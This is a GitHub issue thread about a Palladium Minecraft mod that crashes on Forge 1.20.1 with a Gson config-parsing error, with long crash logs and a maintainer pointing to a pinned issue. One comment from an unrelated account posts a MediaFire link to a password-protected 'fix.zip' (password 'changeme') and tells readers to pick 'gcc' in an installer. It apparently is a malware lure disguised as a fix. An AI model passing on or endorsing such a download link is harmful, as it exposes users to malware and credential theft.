### ISSUE TITLE
1.20.1 Forge 47.3.0 Library error

### ISSUE THREAD

**Issue by Krimatoria** [ITsMrToad/PalladiumMod#10]
ToadLib-1.20-1.20.4-1.1.4.jar
Palladium-1.20-1.20.4-1.0.0.jar

It does not run on the latest version of the palladium library.

> [16:33:10] [modloading-worker-0/ERROR] [ne.mi.fm.ja.FMLModContainer/LOADING]: Failed to create mod instance. ModID: palladium, class com.mr_toad.palladium.core.Palladium
> com.google.gson.JsonSyntaxException: java.lang.IllegalStateException: Expected a string but was BEGIN_OBJECT at line 10 column 37 path $.resourceLocationDeduplication
> 	at com.google.gson.internal.bind.ReflectiveTypeAdapterFactory$Adapter.read(ReflectiveTypeAdapterFactory.java:395) ~[gson-2.10.jar%2372!/:?] {}
> 	at com.google.gson.Gson.fromJson(Gson.java:1214) ~[gson-2.10.jar%2372!/:?] {re:mixin}
> 	at com.google.gson.Gson.fromJson(Gson.java:1124) ~[gson-2.10.jar%2372!/:?] {re:mixin}
> 	at com.google.gson.Gson.fromJson(Gson.java:1062) ~[gson-2.10.jar%2372!/:?] {re:mixin}
> 	at com.mr_toad.palladium.core.config.PalladiumConfig.loadOrCreate(PalladiumConfig.java:44) ~[Palladium-1.20-1.20.4-1.0.0.jar%23137!/:1.0.0] {re:mixin,re:classloading}
> 	at com.mr_toad.palladium.core.Palladium.<init>(Palladium.java:55) ~[Palladium-1.20-1.20.4-1.0.0.jar%23137!/:1.0.0] {re:mixin,re:classloading}
> 	at jdk.internal.reflect.NativeConstructorAccessorImpl.newInstance0(Native Method) ~[?:?] {}
> 	at jdk.internal.reflect.NativeConstructorAccessorImpl.newInstance(Unknown Source) ~[?:?] {}
> 	at jdk.internal.reflect.DelegatingConstructorAccessorImpl.newInstance(Unknown Source) ~[?:?] {}
> 	at java.lang.reflect.Constructor.newInstanceWithCaller(Unknown Source) ~[?:?] {}
> 	at java.lang.reflect.Constructor.newInstance(Unknown Source) ~[?:?] {}
> 	at net.minecraftforge.fml.javafmlmod.FMLModContainer.constructMod(FMLModContainer.java:70) ~[javafmllanguage-1.20.1-47.3.0.jar%23142!/:?] {}
> 	at net.minecraftforge.fml.ModContainer.lambda$buildTransitionHandler$4(ModContainer.java:124) ~[fmlcore-1.20.1-47.3.0.jar%23141!/:?] {}
> 	at java.util.concurrent.CompletableFuture$AsyncRun.run(Unknown Source) ~[?:?] {}
> 	at java.util.concurrent.CompletableFuture$AsyncRun.exec(Unknown Source) ~[?:?] {}
> 	at java.util.concurrent.ForkJoinTask.doExec(Unknown Source) ~[?:?] {}
> 	at java.util.concurrent.ForkJoinPool$WorkQueue.topLevelExec(Unknown Source) ~[?:?] {}
> 	at java.util.concurrent.ForkJoinPool.scan(Unknown Source) ~[?:?] {}
> 	at java.util.concurrent.ForkJoinPool.runWorker(Unknown Source) ~[?:?] {}
> 	at java.util.concurrent.ForkJoinWorkerThread.run(Unknown Source) ~[?:?] {}
> Caused by: java.lang.IllegalStateException: Expected a string but was BEGIN_OBJECT at line 10 column 37 path $.resourceLocationDeduplication
> 	at com.google.gson.stream.JsonReader.nextString(JsonReader.java:834) ~[gson-2.10.jar%2372!/:?] {}
> 	at com.google.gson.internal.bind.TypeAdapters$EnumTypeAdapter.read(TypeAdapters.java:910) ~[gson-2.10.jar%2372!/:?] {}
> 	at com.google.gson.internal.bind.TypeAdapters$EnumTypeAdapter.read(TypeAdapters.java:859) ~[gson-2.10.jar%2372!/:?] {}
> 	at com.google.gson.internal.bind.ReflectiveTypeAdapterFactory$1.readIntoField(ReflectiveTypeAdapterFactory.java:212) ~[gson-2.10.jar%2372!/:?] {}
> 	at com.google.gson.internal.bind.ReflectiveTypeAdapterFactory$FieldReflectionAdapter.readField(ReflectiveTypeAdapterFactory.java:431) ~[gson-2.10.jar%2372!/:?] {}
> 	at com.google.gson.internal.bind.ReflectiveTypeAdapterFactory$Adapter.read(ReflectiveTypeAdapterFactory.java:391) ~[gson-2.10.jar%2372!/:?] {}
> 	... 19 more

> ---- Minecraft Crash Report ----
> // Daisy, daisy...
> 
> Time: 2024-08-28 16:33:17
> Description: Mod loading error has occurred
> 
> java.lang.Exception: Mod Loading has failed
> 	at net.minecraftforge.logging.CrashReportExtender.dumpModLoadingCrashReport(CrashReportExtender.java:60) ~[forge-1.20.1-47.3.0-universal.jar%23145!/:?] {re:classloading}
> 	at net.minecraftforge.client.loading.ClientModLoader.completeModLoading(ClientModLoader.java:138) ~[forge-1.20.1-47.3.0-universal.jar%23145!/:?] {re:classloading,pl:runtimedistcleaner:A}
> 	at net.minecraft.client.Minecraft.lambda$new$4(Minecraft.java:571) ~[client-1.20.1-20230612.114412-srg.jar%23140!/:?] {re:classloading,pl:accesstransformer:B,pl:runtimedistcleaner:A}
> 	at net.minecraft.Util.m_137521_(Util.java:421) ~[client-1.20.1-20230612.114412-srg.jar%23140!/:?] {re:classloading}
> 	at net.minecraft.client.Minecraft.lambda$new$5(Minecraft.java:564) ~[client-1.20.1-20230612.114412-srg.jar%23140!/:?] {re:classloading,pl:accesstransformer:B,pl:runtimedistcleaner:A}
> 	at net.minecraftforge.client.loading.ForgeLoadingOverlay.m_88315_(ForgeLoadingOverlay.java:146) ~[forge-1.20.1-47.3.0-universal.jar%23145!/:?] {re:classloading}
> 	at net.minecraft.client.renderer.GameRenderer.m_109093_(GameRenderer.java:954) ~[client-1.20.1-20230612.114412-srg.jar%23140!/:?] {re:classloading,pl:accesstransformer:B,pl:runtimedistcleaner:A}
> 	at net.minecraft.client.Minecraft.m_91383_(Minecraft.java:1146) ~[client-1.20.1-20230612.114412-srg.jar%23140!/:?] {re:classloading,pl:accesstransformer:B,pl:runtimedistcleaner:A}
> 	at net.minecraft.client.Minecraft.m_91374_(Minecraft.java:718) ~[client-1.20.1-20230612.114412-srg.jar%23140!/:?] {re:classloading,pl:accesstransformer:B,pl:runtimedistcleaner:A}
> 	at net.minecraft.client.main.Main.main(Main.java:218) ~[minecraft-1.20.1-client.jar:?] {re:classloading,pl:runtimedistcleaner:A}
> 	at jdk.internal.reflect.NativeMethodAccessorImpl.invoke0(Native Method) ~[?:?] {}
> 	at jdk.internal.reflect.NativeMethodAccessorImpl.invoke(Unknown Source) ~[?:?] {}
> 	at jdk.internal.reflect.DelegatingMethodAccessorImpl.invoke(Unknown Source) ~[?:?] {}
> 	at java.lang.reflect.Method.invoke(Unknown Source) ~[?:?] {}
> 	at net.minecraftforge.fml.loading.targets.CommonLaunchHandler.runTarget(CommonLaunchHandler.java:111) ~[fmlloader-1.20.1-47.3.0.jar:?] {}
> 	at net.minecraftforge.fml.loading.targets.CommonLaunchHandler.clientService(CommonLaunchHandler.java:99) ~[fmlloader-1.20.1-47.3.0.jar:?] {}
> 	at net.minecraftforge.fml.loading.targets.CommonClientLaunchHandler.lambda$makeService$0(CommonClientLaunchHandler.java:25) ~[fmlloader-1.20.1-47.3.0.jar:?] {}
> 	at cpw.mods.modlauncher.LaunchServiceHandlerDecorator.launch(LaunchServiceHandlerDecorator.java:30) ~[modlauncher-10.0.9.jar:?] {}
> 	at cpw.mods.modlauncher.LaunchServiceHandler.launch(LaunchServiceHandler.java:53) ~[modlauncher-10.0.9.jar:?] {}
> 	at cpw.mods.modlauncher.LaunchServiceHandler.launch(LaunchServiceHandler.java:71) ~[modlauncher-10.0.9.jar:?] {}
> 	at cpw.mods.modlauncher.Launcher.run(Launcher.java:108) ~[modlauncher-10.0.9.jar:?] {}
> 	at cpw.mods.modlauncher.Launcher.main(Launcher.java:78) ~[modlauncher-10.0.9.jar:?] {}
> 	at cpw.mods.modlauncher.BootstrapLaunchConsumer.accept(BootstrapLaunchConsumer.java:26) ~[modlauncher-10.0.9.jar:?] {}
> 	at cpw.mods.modlauncher.BootstrapLaunchConsumer.accept(BootstrapLaunchConsumer.java:23) ~[modlauncher-10.0.9.jar:?] {}
> 	at cpw.mods.bootstraplauncher.BootstrapLauncher.main(BootstrapLauncher.java:141) ~[bootstraplauncher-1.1.2.jar:?] {}
> 	at jdk.internal.reflect.NativeMethodAccessorImpl.invoke0(Native Method) ~[?:?] {}
> 	at jdk.internal.reflect.NativeMethodAccessorImpl.invoke(Unknown Source) ~[?:?] {}
> 	at jdk.internal.reflect.DelegatingMethodAccessorImpl.invoke(Unknown Source) ~[?:?] {}
> 	at java.lang.reflect.Method.invoke(Unknown Source) ~[?:?] {}
> 	at io.github.zekerzhayard.forgewrapper.installer.Main.main(Main.java:67) ~[?:?] {}
> 	at org.prismlauncher.launcher.impl.StandardLauncher.launch(StandardLauncher.java:87) ~[?:?] {}
> 	at org.prismlauncher.EntryPoint.listen(EntryPoint.java:129) ~[?:?] {}
> 	at org.prismlauncher.EntryPoint.main(EntryPoint.java:70) ~[?:?] {}

> A detailed walkthrough of the error, its code path and all known details is as follows:
> ---------------------------------------------------------------------------------------
> 
> -- Head --
> Thread: Render thread
> Suspected Mods: NONE
> Stacktrace:
> 	at com.google.gson.stream.JsonReader.nextString(JsonReader.java:834) ~[gson-2.10.jar%2372!/:?] {}
> -- MOD palladium --
> Details:
> 	Caused by 0: com.google.gson.JsonSyntaxException: java.lang.IllegalStateException: Expected a string but was BEGIN_OBJECT at line 10 column 37 path $.resourceLocationDeduplication
> 		at com.google.gson.internal.bind.ReflectiveTypeAdapterFactory$Adapter.read(ReflectiveTypeAdapterFactory.java:395) ~[gson-2.10.jar%2372!/:?] {}
> 		at com.google.gson.Gson.fromJson(Gson.java:1214) ~[gson-2.10.jar%2372!/:?] {re:mixin}
> 		at com.google.gson.Gson.fromJson(Gson.java:1124) ~[gson-2.10.jar%2372!/:?] {re:mixin}
> 		at com.google.gson.Gson.fromJson(Gson.java:1062) ~[gson-2.10.jar%2372!/:?] {re:mixin}
> 		at com.mr_toad.palladium.core.config.PalladiumConfig.loadOrCreate(PalladiumConfig.java:44) ~[Palladium-1.20-1.20.4-1.0.0.jar%23137!/:1.0.0] {re:mixin,re:classloading}
> 		at com.mr_toad.palladium.core.Palladium.<init>(Palladium.java:55) ~[Palladium-1.20-1.20.4-1.0.0.jar%23137!/:1.0.0] {re:mixin,re:classloading}
> 		at jdk.internal.reflect.NativeConstructorAccessorImpl.newInstance0(Native Method) ~[?:?] {}
> 		at jdk.internal.reflect.NativeConstructorAccessorImpl.newInstance(Unknown Source) ~[?:?] {}
> 		at jdk.internal.reflect.DelegatingConstructorAccessorImpl.newInstance(Unknown Source) ~[?:?] {}
> 		at java.lang.reflect.Constructor.newInstanceWithCaller(Unknown Source) ~[?:?] {}
> 		at java.lang.reflect.Constructor.newInstance(Unknown Source) ~[?:?] {}
> 		at net.minecraftforge.fml.javafmlmod.FMLModContainer.constructMod(FMLModContainer.java:70) ~[javafmllanguage-1.20.1-47.3.0.jar%23142!/:?] {}
> 		at net.minecraftforge.fml.ModContainer.lambda$buildTransitionHandler$4(ModContainer.java:124) ~[fmlcore-1.20.1-47.3.0.jar%23141!/:?] {}
> 		at java.util.concurrent.CompletableFuture$AsyncRun.run(Unknown Source) ~[?:?] {}
> 		at java.util.concurrent.CompletableFuture$AsyncRun.exec(Unknown Source) ~[?:?] {}
> 		at java.util.concurrent.ForkJoinTask.doExec(Unknown Source) ~[?:?] {}
> 		at java.util.concurrent.ForkJoinPool$WorkQueue.topLevelExec(Unknown Source) ~[?:?] {}
> 		at java.util.concurrent.ForkJoinPool.scan(Unknown Source) ~[?:?] {}
> 		at java.util.concurrent.ForkJoinPool.runWorker(Unknown Source) ~[?:?] {}
> 		at java.util.concurrent.ForkJoinWorkerThread.run(Unknown Source) ~[?:?] {}
> 
> 	Mod File: /C:/Users/Dotka/AppData/Roaming/PrismLauncher/instances/test/.minecraft/mods/Palladium-1.20-1.20.4-1.0.0.jar
> 	Failure message: Palladium (palladium) has failed to load correctly
> 		com.google.gson.JsonSyntaxException: java.lang.IllegalStateException: Expected a string but was BEGIN_OBJECT at line 10 column 37 path $.resourceLocationDeduplication
> 	Mod Version: 1.0.0
> 	Mod Issue URL: https://github.com/ITsMrToad/PalladiumMod/issues
> 	Exception message: java.lang.IllegalStateException: Expected a string but was BEGIN_OBJECT at line 10 column 37 path $.resourceLocationDeduplication
> Stacktrace:
> 	at com.google.gson.stream.JsonReader.nextString(JsonReader.java:834) ~[gson-2.10.jar%2372!/:?] {}
> 	at com.google.gson.internal.bind.TypeAdapters$EnumTypeAdapter.read(TypeAdapters.java:910) ~[gson-2.10.jar%2372!/:?] {}
> 	at com.google.gson.internal.bind.TypeAdapters$EnumTypeAdapter.read(TypeAdapters.java:859) ~[gson-2.10.jar%2372!/:?] {}
> 	at com.google.gson.internal.bind.ReflectiveTypeAdapterFactory$1.readIntoField(ReflectiveTypeAdapterFactory.java:212) ~[gson-2.10.jar%2372!/:?] {}
> 	at com.google.gson.internal.bind.ReflectiveTypeAdapterFactory$FieldReflectionAdapter.readField(ReflectiveTypeAdapterFactory.java:431) ~[gson-2.10.jar%2372!/:?] {}
> 	at com.google.gson.internal.bind.ReflectiveTypeAdapterFactory$Adapter.read(ReflectiveTypeAdapterFactory.java:391) ~[gson-2.10.jar%2372!/:?] {}
> 	at com.google.gson.Gson.fromJson(Gson.java:1214) ~[gson-2.10.jar%2372!/:?] {re:mixin}
> 	at com.google.gson.Gson.fromJson(Gson.java:1124) ~[gson-2.10.jar%2372!/:?] {re:mixin}
> 	at com.google.gson.Gson.fromJson(Gson.java:1062) ~[gson-2.10.jar%2372!/:?] {re:mixin}
> 	at com.mr_toad.palladium.core.config.PalladiumConfig.loadOrCreate(PalladiumConfig.java:44) ~[Palladium-1.20-1.20.4-1.0.0.jar%23137!/:1.0.0] {re:mixin,re:classloading}
> 	at com.mr_toad.palladium.core.Palladium.<init>(Palladium.java:55) ~[Palladium-1.20-1.20.4-1.0.0.jar%23137!/:1.0.0] {re:mixin,re:classloading}
> 	at jdk.internal.reflect.NativeConstructorAccessorImpl.newInstance0(Native Method) ~[?:?] {}
> 	at jdk.internal.reflect.NativeConstructorAccessorImpl.newInstance(Unknown Source) ~[?:?] {}
> 	at jdk.internal.reflect.DelegatingConstructorAccessorImpl.newInstance(Unknown Source) ~[?:?] {}
> 	at java.lang.reflect.Constructor.newInstanceWithCaller(Unknown Source) ~[?:?] {}
> 	at java.lang.reflect.Constructor.newInstance(Unknown Source) ~[?:?] {}
> 	at net.minecraftforge.fml.javafmlmod.FMLModContainer.constructMod(FMLModContainer.java:70) ~[javafmllanguage-1.20.1-47.3.0.jar%23142!/:?] {}
> 	at net.minecraftforge.fml.ModContainer.lambda$buildTransitionHandler$4(ModContainer.java:124) ~[fmlcore-1.20.1-47.3.0.jar%23141!/:?] {}
> 	at java.util.concurrent.CompletableFuture$AsyncRun.run(Unknown Source) ~[?:?] {}
> 	at java.util.concurrent.CompletableFuture$AsyncRun.exec(Unknown Source) ~[?:?] {}
> 	at java.util.concurrent.ForkJoinTask.doExec(Unknown Source) ~[?:?] {}
> 	at java.util.concurrent.ForkJoinPool$WorkQueue.topLevelExec(Unknown Source) ~[?:?] {}
> 	at java.util.concurrent.ForkJoinPool.scan(Unknown Source) ~[?:?] {}
> 	at java.util.concurrent.ForkJoinPool.runWorker(Unknown Source) ~[?:?] {}
> 	at java.util.concurrent.ForkJoinWorkerThread.run(Unknown Source) ~[?:?] {}

**Comment by ITsMrToad** [comment]
Read pinned issue.

**Comment by scheichreisuli** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Krimatoria** [comment]
> Прочитать благоприятный выпуск.

Work)))
